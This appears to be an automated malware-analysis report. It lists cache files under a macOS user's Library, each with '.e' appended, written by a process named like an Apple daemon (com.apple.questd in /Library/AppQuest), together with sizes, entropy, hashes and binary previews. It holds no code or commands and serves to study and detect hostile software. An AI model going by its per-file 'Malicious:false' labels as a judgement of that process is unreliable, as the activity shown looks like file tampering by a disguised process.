                                                                                                    Reputation:low
                                                                                                    Preview: o....d....K...vj>8.b$..o.'........deOA..;d4..k.Ms...$j..E.M.[.Q.....(..W..'.......&Yc.p#...:I.'|A..<`6......h7...|.h...N.&`..}.....k%..&..?.s..._..o..%...J*..I:......u.!...r...)..........Mn+...[...E..=.. w>Z..2.R.|6....._...Pb.%............%K..k..=.}#...=......y+..+CTr..O..J....Y'..9.;o.....H.e..v..6l...(?|.d........^..#.3vg...n..L.a.EzN.&.....z..V.H......_...I....s\IbJ..H....<....#.......R.uav.G.3.q.QS#.Gv..tEz..C....{.D...$..%.!.g..a....z..............8....r.N.m..4.U..;<nU.\ .....2..+7|4*...OA^8..zxY..q.e:...f^......M....j#.S....2"2.5.}N...?E..#...h=.^.+.Y.d{SY.0.t...............O.Ky...(G0..#...5...)...DT./{..O(.,i.[.(8D.]..........x..%.0c.2..EE#d_..;!..!j2<...s...[.....$.t...:.^....rW...h....F......).....`....:..#0.b.3.<.....0.....#.....r...........NE...s.l.@..G..W.h.e>.[g..m._....*x_#....r..0.PSh....)..>.&.....@..Tjy..W.......:&....b....s.w.........I..?..F.....,X....}UC...#.Ci.I..|....@.*...$..A........~......yd_....x...\.k..^-........m.T.._.h.]`...\...I..M~.x.i.......@h\YmL]..;S..
                                                                                                    /Users/ben/Library/Caches/com.apple.metadata.SpotlightNetHelper/fsCachedData/.230B1408-8FDF-4376-81B0-D5F9F40259EB.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):17563
                                                                                                    Entropy (8bit):5.631770607006647
                                                                                                    Encrypted:false
                                                                                                    MD5:8C378453BA7D1148C6F2E224037DDC92
                                                                                                    SHA1:285FF19E9554407E2482EFD2F9C3B5B9ECEFB685
                                                                                                    SHA-256:C1E66627602CE48CFC053C898947E2CAB1156EDD97BDE620CA8D7B37D8D6BEDD
                                                                                                    SHA-512:3813C77596E79EAE106B2CDD07D4F51E6ECF2BAC34B9463A927B202C84F3CD539CA026EE1017C975549A260BC2D0245E3C6B932EFD3FCA42BD5292D7E687B277
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d....K...vj....$....w.2.l/....-S..h....f)....@|........9#v.-..)s.Y...R...K...J.a.0\!G.(x...h..".z........j@..+.t}..Y!.....2.....5..h...gt....O.5.5+{!.F8)H..y..GA...J....~..t.#..M5.Z'.......\..dq...".N..5...fV..... {..:...Y..s.../,J..:7..@G...r-......VJ.-C...5.AW....y0.t.A@.B']..z+...D...{4.6v^.....c,_..SA.....OSl%-......V...V.T..%..P......4?$.!.f..]....v.k...:.{...Kb.Uf^4L...f....v.K.&.sa1.....b.hy.....P.o3. ....9rF{.....-....p../.v).&..l.S.... .........*...P.o3. ....9rFa...E.@..#.3.R)_....&f.VH.......\n...cI~...P.o3..gK...d.{..9.,'].n!..X.....~NRJ....#n.....=....."...?G..'...32.O....a....2..vA.U.(........dTJc.....Y.;y[.....u...J.Jd4..4.....4m.n.)(...#.+.Tp.....P.o3.kIK..I.^.\.....M.......+.u.?.\~....r....f..]....v.k...:....H....J..]...V..5.N.K}.}....:.......u.%...t.....b..#...mz.j......M.4Kf.V;.^...9.;...N...j....D.82.....f..].....I.H....=$.8.....n!..X.....~NRJ..f2..k......!C.Bf..]......X...........d|....E..?.|..&)...F..A...7#;1{.B.K4.Zo...".4..u\.dXA.D.[B.c.~......UP...g.'...j=.
                                                                                                    /Users/ben/Library/Caches/com.apple.metadata.SpotlightNetHelper/fsCachedData/.2533956C-5975-42C3-8338-F13B1A221764.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):32411
                                                                                                    Entropy (8bit):7.990252254846906
                                                                                                    Encrypted:true
                                                                                                    MD5:C3AD95E618BDD391BDA344D1E0A9E655
                                                                                                    SHA1:49FEF9324FB8F5490DAE8DA70EEF44B4D3100907
                                                                                                    SHA-256:B670FCB902B57DD70103652C475470EEF08173DBBDE9D71EA75A739CC31860E3
                                                                                                    SHA-512:51A3860E4818670045DA82211A94F6A2F95985419EA95A8A32B301C31C34BED78A76CD01A73B343190302F82F78B5BA90EB5188192011AABF13CBE274B4B0DFE
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d....K...vj.Y.|?...L..&.....z..7A..oAN.o.<j.%.rU....Q.a.L......]...q...,..1~..:.rE.44.....Q..P.2.../..F.s-.(i..S0&6....U/1;us.L.C....^.1;..w.N8 Y...[j*r.......OQ.....I...w8.Y....`CI.q7.....A...,lk....!g..R.H...1..=.D......p.in.8U...H......y..R..'.......2N%..P0.f....W....!'@c>....%%..ZZ......F......L..vB=0...\...@G.....2sR"n.<..h....u?.F.&... wtC../.li......t"h.T....9.=.....m....#...v/.>..&C.....~bR...........\Cv.W.u .bC*...`./.;..q.B...01......3.......I.)('.....^}g.n.....HC.x....a..D.d......\....Ws..T,.8.{~.:{.....YN4.4..\P..R..,..).S..ra.IE{...@\5.#..s...s$.L..=.|%FZ...i....d...G..n.62.pCG.cf.a.q(...=#k0...QB.o.7Q........F.Y.......t.p.R,..6....@.s.....$.............J..D..w...+....C.b{w.x.;..g.d.Q......G l...X...Q....v...........:I.S.y..\....f.7l.H5.hN...y.....|3...$..G.f..;..+.......Gr..*.D.l..&/..x...8.f. .$O..`j.?..D.+#..?.....z+.....o'...+s|..c.....c...`(7lJ.......o1.....n.......kX....O`.1hvO%....S...f.*....)67#5.F.c....a.L.m....n^._...3y-b.../....J-.u.}T................U.<k..
                                                                                                    /Users/ben/Library/Caches/com.apple.metadata.SpotlightNetHelper/fsCachedData/.3CA00E54-DC41-4A98-85C0-35FB5E3EF2FF.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):168412
                                                                                                    Entropy (8bit):7.92745825253476
                                                                                                    Encrypted:false
                                                                                                    MD5:1948B70008215668EE94BC0AFE438217
                                                                                                    SHA1:B20AC43D18BB2CFFB0C52F6D861844CB09B22933
                                                                                                    SHA-256:7FAB5CEC213DC54563738ABB76E4BE2C8D2E4FB3BA80350FCF18CC7E24103BF9
                                                                                                    SHA-512:1F357C396ABD8182899BA1DE61C23A64B9991189181D428F56C89638BD207493D1C0F6C882363811F59007EF432B56D980887331B747443DB358736E6EF2294A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: I......*....d..5....f...Pf....O...@.......1.............H5x..Tmm.....N......Cey._.xb8.=.vE'...:p#.[(..#....|ohc...S...b9.U)P..0..........a.Gz...8.Ey...Fs.hi-..A..#....(].....E4.++q..H..M.s2U...8$.ZE.......t...... ..w..S...b9.U)P..0......4B.}9.h...w.!Q..9..N..:2|...i.!.X......CIkm..Iq.f#...O... ..6xI&&..K....T...9`..M..............M.*...,.4..oW.......:..c.$.xO.j@..... ..~............'S..7..=.H.gX..M{.Bu,.M.._.#N.%g.M..'."F.@...c.d2.D(s.....g..C....H.....L6.E.....^u^.Z..." ...m..d`.*..u....0.>.e..a.MX...)M....,.x\.G......x......u.....cn{Jl.V.".R.xbF.....~...k.]o!..!Q..9..N..:2|..*o..|g#4...."W*..l#.$ZP...w..h..M{.Bu,.M....Q....7...PB._a.(&...........{1.Y.\o....%h.6....h..Hd..^u^.Z..." ...m1....8...........'S..7......#..xM{.Bu,.M?....y....:u.KY.B.4..6..d2.D(s.....g..C.....Fl._ML....>X.!Q..9..N..:2|.........:....CIkm....{.$.+......?.!.c.8u...K.........9&m.@q*$..B...'.UJ...%xP.,j...j..!&e8.Ey...F......;..jL...pk].....E4......+..4.....^....%J!..K+DO..r./...X.B...z......cn{Jl.V.".R.xbz+&..yt.
                                                                                                    /Users/ben/Library/Caches/com.apple.metadata.SpotlightNetHelper/fsCachedData/.453A02FD-E517-4B1B-AAA1-B95EA848D875.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):49901
                                                                                                    Entropy (8bit):7.930207797593108
                                                                                                    Encrypted:false
                                                                                                    MD5:D2156B2CEEAB19EBBFC77722A03D4952
                                                                                                    SHA1:AE469000A99E13BD3F85F5B8754540228244FE4B
                                                                                                    SHA-256:E23984E133AFE35F08C85FE5506646EBBCD5E924D5355FB067FCC71EF7A02236
                                                                                                    SHA-512:373E4677F30C1B8155538E564A3E92367D6570E003C5BAEA1D133D7201143C9F98C7A9B27271A63896FFB1B1726C22D01D1F08F8EB1E06998BA461D9C0646F51
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: U..B.y...0..v..S.........p..:.?<.0..v..S.s...E....3..W.DV.}..rg..|o..1j..;.7.K.V.7...6.0.........r...N...v..2.....E........)K...apk.....*.?....q...L.....(.9.7Nz|.........DG...O. ...oS3&..k....U.F< ...)S...3....+.=._g.....Ar......>....N.s.U.....3.....vVk.=(....-..S.lp.&...v.........[.b......Y...0.lp.&...v.........H"O..nL........".<^.... .H+\...9l.W.q......_.9.p..v.eg.......P...$E.3...?a+.6..pW.2y.......NX........G1-x`t.../q.]..u-....."X59.MD.......7Y.....j..T9A.............;$....IX.....=.V..n.{0 .45./.;. !.a...^....%....x..BG...N;^.....x..J...A+.b....}.N.5@.0.#&..o[.I.k..i..D7.....^....f...m...*Z.%...Go..v.....gp.9.. .._....G}...J-.Y...zI.*?E.].c:Ig..Sj.....+.....1G9.u.t..j..@.!!..gp.9.. .._....G.....uI3d.1..o.J.......G1-x`t...*9..m.}I"+..z.......w.)M[L.zC.oH....zg.R..x/w.....Q.i.e...P.)O.L.......zY.....'.. 4}d...d.1..o.J.-..5..}.....x...f[z..C.....}.N.5@.0.#&..o[.I.k.D..O.@r.$-f...8..W..h).'?y.L.;...m.!.M]...6...V..M.>x?d....7E!........7..Df.z.......+.o..._..t,....zI.*?E.].c:Ig..Sj....
                                                                                                    /Users/ben/Library/Caches/com.apple.metadata.SpotlightNetHelper/fsCachedData/.78DDB1D7-21C3-46B6-8E0D-E46E2CA66F99.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):35540
                                                                                                    Entropy (8bit):7.99214188341633
                                                                                                    Encrypted:true
                                                                                                    MD5:291F0CC4247AD285680147C8731AA47F
                                                                                                    SHA1:D465004643659D25050CE6C7FD683ABB4F0B79D0
                                                                                                    SHA-256:6C2A0A9546C88D4C2B634B68EDB74805226D16FB48FB69AE1FB4D044DEDC6E7A
                                                                                                    SHA-512:EEB2B7FC83B00D8797E1BA30A88A2481E33465663C3E8C62965DCFBE7D3A49ABF2F4831288B8907FBCB0AE84A5986EBE58B27EBAB24E010DB45201548BA2058D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d....K...vj..d.R.{..a..k..9..u.......rV...b:Umx..(W....LK....(dp......4.d....u....V..R...K.e..(Z+..!G.(x...h..".z........j@..+.t}..Y!.....2.....5....wl......O.5.5+{!.F8)H..y..GA...J....~..t.#..M5.Z'.......\..dq...o^........k.....T..i....Fno..2j....3.".f.........n...4..c...rW..+.......=:v...?{.W}..G...<.....].M....~...kb'.9.....^SG..JD.,..>.&M1?.z..N.[+%!-....4..^._.b.........+..U..&tRi0\...SS~i.......OpC.}.w..5.N.K}.}....:...Yx"..........e.(........dTJc.....Y.;y[.....u...J.Jd4..4.....4m.n.)(...mpi..c.R.. ....>...U..,...'g..{....R........m!6%+.d'.'.....a88...1i....r.6....l.......EG..X..6q.m...{*n........].*.^.O..f]..Tv..]$jl.....M.........pR(....r..//...D..}.].U<~.....EK.......>.......m.j.p......8q.....k....z"...h..i5.......r..//...D..}.].U<~......C*DV..#. ...#..6....l..".....m.OT....Tm...{*n........].3....7-..RA.c.@w.Y>g.....q.0.s.*..|>4*$._..}._V.)S...[A..*^..Q..........n....L...^...o..J...w...Ry~...w..../.p@..D.n.;.%.*....Ao.>..............gP....A...(x.....`.L>..l/*.......X...I.
                                                                                                    /Users/ben/Library/Caches/com.apple.metadata.SpotlightNetHelper/fsCachedData/.7AC7FE0E-2290-4EEA-9369-AD0A7A43E5A4.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):121281
                                                                                                    Entropy (8bit):7.896166899328912
                                                                                                    Encrypted:false
                                                                                                    MD5:732B8C2B5020DF6A0EE10D7F3FDCA7AD
                                                                                                    SHA1:AD1BEFC8D19BE2D892AA620D9BB8BDAEDD2F98DA
                                                                                                    SHA-256:9A8D63F251A924B502F7D40B3CC821502E28D643124513C6890CD71D1EE2EE35
                                                                                                    SHA-512:A88789D9078BCA2AAFB1CE4376C9954914FC39054FB94537F0985CBFDA8818168B5A0C711C7A05EA130CD341442D8F1E7EB6CAEBD4E8838596D075D088490771
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: I......*....d..5&Ji....4Pf....O.....{.$....P22.]..u..P.St_|4......!....W....Cey._.xb8.=.vE'...:p#.[(..#....|ohc...z.5U.8.." ...m.................'S..7......P]..M{.Bu,.M..#..............d..:..{.F..?.h..!f[..v./..0.....e:......5..8`8j.....?..I.*9.V_....F...P.X.L_..T..0H.X..8.Ey...F...[...[..H.r1...0.<...;... w..iV....b(.>.s[>;....B..f...).>f..m8.^Cf.I.?.O..v0.N..:2|...mB.+%CTF.e...A..l#.$ZP.f.;]B....M....+...{...B....?.a(p8.Ey...F...P%..Hj....r.{.0.<...;..XxRvu.>.A^.$....n......9O.... ....q+.....+..Z...z.5U.8.." ...m*.....C..........'S..7......#..xM{.Bu,.M?....y....:u.KY.B.4..6..".v<.i.wNr._6.N....Y.<..X.,.i..3Y....u..<.a.S.y>M{.Bu,.MF(.V...%.E.Yv)\b.....-G..F..?.h..!f[..v.[.%.2Lb..e:.....P/{2..r...A......X....x.Gu/.......'...`..g)..u../M.....XO.j@....+....s.,.........'S..7...b.1....M{.Bu,.M6.E.{....Nd[...A.....}...iC......F..?.h..!f[..v.=L....O..e:.....Q]C.6{...+..(.Q..]..4m..6....~Q.ah..."M./M.....XO.j@......O(...oF.e...A..l#.$ZP....'.x.7.,.x\.G. ...t.....b..ON...z.5U.8.." ...m}.^BDG..
                                                                                                    /Users/ben/Library/Caches/com.apple.metadata.SpotlightNetHelper/fsCachedData/.AC93C472-62D7-40C8-A79A-FA239544A339.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):27355
                                                                                                    Entropy (8bit):7.988446874073549
                                                                                                    Encrypted:false
                                                                                                    MD5:C8C69CA5A5160026D4C427BC20796E0A
                                                                                                    SHA1:87DBE82C813F9F51CA03D371764F46ECAD325292
                                                                                                    SHA-256:3F70D8905DD332550143B0E1B772FED13951C71AA422D6B31C81660FB3D23AE8
                                                                                                    SHA-512:D7750FD096D6433B35D444933DCF3E6D7D6DD3A70DD5E01733EC6DD4A70BEEE5B051F30DF1EC90E3FACC88C465CD31C30636198558E5AFFFA00D9E6141AF8ED9
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d....K...vj>8.b$..o.'........deOA..;d4..k.Ms...$j..E.M.[.Q.....(..W..'.......&Yc.p#...:I.'|A..<`6......h7...|.h...N.&`..}.....k%..&..?.s..._..o..%...J*..I:......u.!...r...)..........Mn+...[...E..=.. w>Z..2.R.|6....._...Pb.%............%K..k..=.}#...=......y+..+CTr..O..J....Y'..9.;o.....H.e..v..6l...(?|.d........^..#.3vg...n..L.a.EzN.&.....z..V.H......_...I....s\IbJ..H....<....#.......R.uav.G.3.q.QS#.Gv..tEz..C....{.D...$..%.!.g..a....z..............8....r.N.m..4.U..;<nU.\ .....2..+7|4*...OA^8..zxY..q.e:...f^......M....j#.S....2"2.5.}N...?E..#...h=.^.+.Y.d{SY.0.t...............O.Ky...(G0..#...5...)...DT./{..O(.,i.[.(8D.]..........x..%.0c.2..EE#d_..;!..!j2<...s...[.....$.t...:.^....rW...h....F......).....`....:..#0.b.3.<.....0.....#.....r...........NE...s.l.@..G..W.h.e>.[g..m._....*x_#....r..0.PSh....)..>.&.....@..Tjy..W.......:&....b....s.w.........I..?..F.....,X....}UC...#.Ci.I..|....@.*...$..A........~......yd_....x...\.k..^-........m.T.._.h.]`...\...I..M~.x.i.......@h\YmL]..;S..
                                                                                                    /Users/ben/Library/Caches/com.apple.metadata.SpotlightNetHelper/fsCachedData/.B540A475-1C33-40AC-A693-D339979E9B4F.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):18731
                                                                                                    Entropy (8bit):5.781675749652038
                                                                                                    Encrypted:false
                                                                                                    MD5:BF3DDFDB45D5C9AF2714EFB27BB0D896
                                                                                                    SHA1:AEF989F0E63C93FF30F99DBD8E57512C7F3B291F
                                                                                                    SHA-256:BFD1CBC367C0D3F617ED2F463CE7CFE14EB722C7C8D1AFC8056AF68267CBA8FE
                                                                                                    SHA-512:4E93EF3B54BFB263D2E589A432CBC8EDE97DE4B63E0849A3BCB3C15E9FCDA4B67D164CE755795F5CCD05B2A4EE61A7FE0F8FA8265D3FB696588A83CF6E1FA822
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d....K...vj...E...@F..XW..`F...<.7.....f)....@|....h.nG....-..)s.Y...R...K...J.a.0\!G.(x...h..".z........j@..+.t}..Y!.....2.....5..h...gt....O.5.5+{!.F8)H..y..GA...J....~..t.#..M5.Z'.......\..dq...".N..5...fV..... {..:...Y..s.../,J..:7..@G...r-......VJ.-C...5.AW....y0.t.A@.B']..z+...D...{4.6v^.....c,_..SA.....OSl%-......V...V.T..%..P......4?$.!.f..]....v.k...:.{...Kb.Uf^4L...f....v.K.&.sa1.....b.hy.....P.o3. ....9rF{.....-....p../.v).&..l.S.... .........*...P.o3. ....9rF..j'.....^._.b.........+.u.?.\~.v4H...e.O:....#....P.o3...K..w....`...A/f^4L...f....v.K.&.sa1......D... f..].....I.H.....+..a:...V;.^...9.;...N.WI.(?...;.A....Q.....=....\w.o... F....y...P.o3.REt*...v...........H.D..>..........n.^....-/..U0|.eh0.Or%.pV.c.f...P.o3...j;0..K...C. a2...H.D..>.......=fOz......b..&~W...P.o3.,t..].[b_..G;.-....Y.;y[.....u....<...U....O...u._.\]5c...D2..f.I...,.g.3^}...)...dW.......Z...3b..hw......[.!.$....--@+...i"...f.k...4g...zK..."......|...)..v.....9N..p)..0%`...9..a0K....8.?....P.o3.
                                                                                                    /Users/ben/Library/Caches/com.apple.metadata.SpotlightNetHelper/fsCachedData/.C9584DE6-6DA3-4F28-AD17-5E52C5BB8704.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):35972
                                                                                                    Entropy (8bit):7.99118468210112
                                                                                                    Encrypted:true
                                                                                                    MD5:7889C58BC3526B6853293189271AF240
                                                                                                    SHA1:624D1F73FD2BF7A01E76E3CA185AAE283A85557A
                                                                                                    SHA-256:01799EB8DC91694DCEA3DD8123EBCBC0DA077A5DA973C38D48C0D57A7080CFA6
                                                                                                    SHA-512:34AA74AD1E22D947F55D41286AB69376DB71ECA3A9CACF48C2C24562CD077B6F2DF6D282FD3B4D5F751F64A4896D4D1A98FAF8E7E01257AB7A13B2A15006AF59
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d....K...vj.Y.|?...L..&.....z..7A..oAN.o.<j.%.rU....Q.a.L......]...q...,..1~..:.rE.44.....Q..P.2.../..F.s-.(i..S0&6....U/1;us.L.C....^.1;..w.N8 Y...[j*r.......OQ.....I...w8.Y....`CI.q7.....A...,lk....!g..R.H...1..=.D......p.in.8U...H......y..R..'.......2N%..P0.f....W....!'@c>....%%..ZZ......F......L..vB=0...\...@G.....2sR"n.<..h....u?.F.&... wtC../.li......t"h.T....9.=.....m....#...v/.>..&C.....~bR...........\Cv.W.u .bC*...`./.;..q.B...01......3.......I.)('.....^}g.n.....HC.x....a..D.d......\....Ws..T,.8.{~.:{.....YN4.4..\P..R..,..).S..ra.IE{...@\5.#..s...s$.L..=.|%FZ...i....d...G..n.62.pCG.cf.a.q(...=#k0...QB.o.7Q........F.Y.......t.p.R,..6....@.s.....$.............J..D..w...+....C.b{w.x.;..g.d.Q......G l...X...Q....v...........:I.S.y..\....f.7l.H5.hN...y.....|3...$..G.f..;..+.......Gr..*.D.l..&/..x...8.f. .$O..`j.?..D.+#..?.....z+.....o'...+s|..c.....c...`(7lJ.......o1.....n.......kX....O`.1hvO%....S...f.*....)67#5.F.c....a.L.m....n^._...3y-b.../....J-.u.}T................U.<k..
                                                                                                    /Users/ben/Library/Caches/com.apple.parsecd/.spotlight_phrase_dictionary.map.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):3391488
                                                                                                    Entropy (8bit):7.96034686482724
                                                                                                    Encrypted:false
                                                                                                    MD5:F66AB80FE12C2D71558A25EB52D10B08
                                                                                                    SHA1:E2F99078A0E905E6ACC5F2D6DF276384B9D12F2C
                                                                                                    SHA-256:608E60F5EFED44257ED15342AB74A919EE3D10D26D0FFC1B901AE1B97514761F
                                                                                                    SHA-512:E916CC3F7EE6E9993F85E253D3B41B1AFF58E4084023F3DFF02317F125043F2A209DAD7898AEB40EED33C0EC3000793D559128F52509C32F78D53D8AEF5EA7AC
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .n}.....4P.{.NA_.].....:.m....p.#.......O...3..8.........V...k. ....x.1J....._3..L.D<.+........'..................$3].#.....................p..l.7..... .................................................._L..qg........H.....b....`Q..[B.j.ki{.0.[..y..>.......m....V...?.q....."..j{z.......)...........@..D...P.8...X.........................L.D<.+.hJ=..,.../n.....^[.R.S.......K.,}^6....Sr..E.n@.....I..../`..t.g...".7.|.....Z.....+..(.).(O...N..{:'...F.....e/.5-..C..........@....hQKT...=8..............................>2".n.z..:.W$..af9.?........D..O..u..........s.v.%..Gjm,P....J..R.\w........oc.'.-..................(.....l tXr....H..W.>.<.lb..{|__.........}L~.a.z}..S..6.PP.....u...5q..E.I.."..V..`d...e.................................x.:..#..............z...N6.*.s%..........5...M....M.......D.q.......+......>V\ ..oEJ`.F...<..2.....7....E.H.Bn:.L.D<.+.:.....5.kb..|N.o.5r.;7Pom.c..j7............|$.:4...eCA[..~..I...:.\... ..7"YI%.n!...............E....C..,..R..ty.C... '.....K..Hv.<..5..I*.:....
                                                                                                    /Users/ben/Library/Caches/com.apple.parsecd/.spotlight_stopword.map.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):149163
                                                                                                    Entropy (8bit):7.940674299045554
                                                                                                    Encrypted:false
                                                                                                    MD5:E91D5E7231BF344EBDC1BC1BCFFBEDA8
                                                                                                    SHA1:CD77ACB32103705EBAFD5FDDF30C7EF726CC4E6C
                                                                                                    SHA-256:EE11961E2E7A1A15DFAA31C91B7BC6E4216D58579AE4103836C5226E3C6C127E
                                                                                                    SHA-512:31769AD10CB11503B042D996C369D3C074768F5399C94BD7BFFDC27D002F5F61426129A3027820BE78BE7C4D730D12AFDE12DD0A2DD2BF6A31B70651D1D6B4B2
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .n}.....4P.{.NA_.[t....X.q.gW...*.m.e.9~v...@.............|.........`.....:kd.A8.L.D<.+.......v.g${....r..I....&|..(.rUR.-.a......1'EI...........................|.zX............r|.7...2.N.....=k.]...-F...,.s. .Oe.r7.9.M.....L......b....i...........k......r...d..N....P#..U..k..l.......r.h..s................o-n...d.8.4.V.................L.D<.+...J.Hy...[..\:O....................2Sp.....................a..+=..k.\&..W.5.M..........W....(.C.................pV.....t.g!...z.p9..b6..Rk`..Z..........:....d3@..m{l.....A..`..4..L7m.h.....i...-.+...............'.<.I;.....m.......h....gY.iQ.....v8.......{..........}2......:.D.E..y...;..%. .Z.-l;..^..X.....k..c.._..........`z.<......................9.....dFO$..n8.-.PV..>.w....}...o..Dc.7....8hq_...................[...,?Uw...........^...".SS......B).$Mi.(..@"|....G5..:..........9.g.......e8.~>8@..\....M...].. ..lZ1...........4j..N>{..............WX..................+......3..J..7..=...S.....0..o.=..9..9...................V}.#.R .{..:...xnk.p..+......
                                                                                                    /Users/ben/Library/Caches/com.apple.parsecd/Cohorts/.cohorts.sqlite-shm.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):33091
                                                                                                    Entropy (8bit):3.500822124185939
                                                                                                    Encrypted:false
                                                                                                    MD5:0DE04BF3F96A926B8875D4A57FBD9E12
                                                                                                    SHA1:EDE54961615FC903E896A7760B4F7EA2E1A42ABA
                                                                                                    SHA-256:E4FDD883F0771D97D140B0ED85F6EE2F7061DC4897A86051E94104A50C19876A
                                                                                                    SHA-512:807B4795573ECE9CF1FDA00A82BE36EA39635A221642C5D7AFED6D9FB71547EDEB98593A1281BA791586D66B3C6D5A891309450962623F86ABBF7CCC047DEA5B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: >.k....Lv...S...7.....z..X...xy2.....U..X.pz5...>.k....Lv...S...7.....z..X...xy2.O.l..T.X.pz5............!..!....9.o..h$........%.@u.......B.>t.7.....W........0..p.Pk{k.....(....8._5._..p.Pk{k...@'.....p.Pk{k.....(.....=l....g..gm,._.Y..<.!.x....._..p.Pk{kKp..x.*X..R.Y...9...d...^.vl./..9...d...^.vl./..9...d...^.vl./..9...d...R..g.j........k...p.Pk{kKp..x.*X..R.Y...9...d...R..g.j....8._5._...B.>t.7.....W..x....._^.vl./..9...d...^.vl./..9...d...^.vl./..9...d...^.vl./..9...d......B.>t.7.....W........07.....W........07.....W..b..1............................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.parsecd/Cohorts/.cohorts.sqlite-wal.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):408442
                                                                                                    Entropy (8bit):3.754273218773133
                                                                                                    Encrypted:false
                                                                                                    MD5:74CF36AA4D87501AE57CA215FF11045B
                                                                                                    SHA1:075AC09B9337E5EABD595F404A4CDF7D6C37CDE5
                                                                                                    SHA-256:0EC1119D378A0C8B47025128179B6EAA4A0BA1D68889B8267A06485E6887BEF6
                                                                                                    SHA-512:B7A2D5356E5878ACF69E3E65C55590430111E60E4E997D558E48603A7EA8E9C472A292E6E343BE845F6EADE83756B714364D6E66004723A3CB3915EBDA22CEF4
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: @....[...L.-$........U...ncis...t...7........U..E4?Ai.g..#.1rS..a....lT........tgU..C..}...........QA..K'.:..?..t...7...t...7...................~.$O....,,.<.~..&..n.2.m5..]....#..S..-..........................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.parsecd/Cohorts/.cohorts.sqlite.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):45388
                                                                                                    Entropy (8bit):4.245407425813334
                                                                                                    Encrypted:false
                                                                                                    MD5:FCCF1BEF93867DD454C2F42E3096A41A
                                                                                                    SHA1:F7BAA26F7A1E0B759620CD0AE33E31927B65B54D
                                                                                                    SHA-256:34046018C66D6B74BF722B6FECA9F653C22E5FBFF612642C4680657DD0E6412C
                                                                                                    SHA-512:3918938290CCEA8B79E33749295D58C35E1850DADC35662B4F8C73459E90C8514B0B9941125A98D114A3B34C126C60B3D6C4AE4CA312220BFB1389EE1859D8DF
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .#.1rS..a....lT........t.W..&.(............QA..K'.:..?..t...7...t...7............L.D<.+.......]!,,.<.~..&..n.2.m5..]....#..S..-..................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.parsecd/spotlight_phrase_dictionary.map
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):9897
                                                                                                    Entropy (8bit):7.9578131826232585
                                                                                                    Encrypted:false
                                                                                                    MD5:7B58B3AAF5E23D23E3BCACAA28FAF17A
                                                                                                    SHA1:2393FF310A1EC81FADD850F24C285C5365119144
                                                                                                    SHA-256:65929883E09617CFFEA583F0496B26B18DDA587B92AD8E8B6D88FC199D7169D2
                                                                                                    SHA-512:C36C545105826F0AE370DE4A70C019A67850BAB348C813798EE7EFEAE745FA04D94307690ED186C387645417431A5463F421D5E232B87D265635D705F11E67BD
                                                                                                    Malicious:false
                                                                                                    Reputation:low
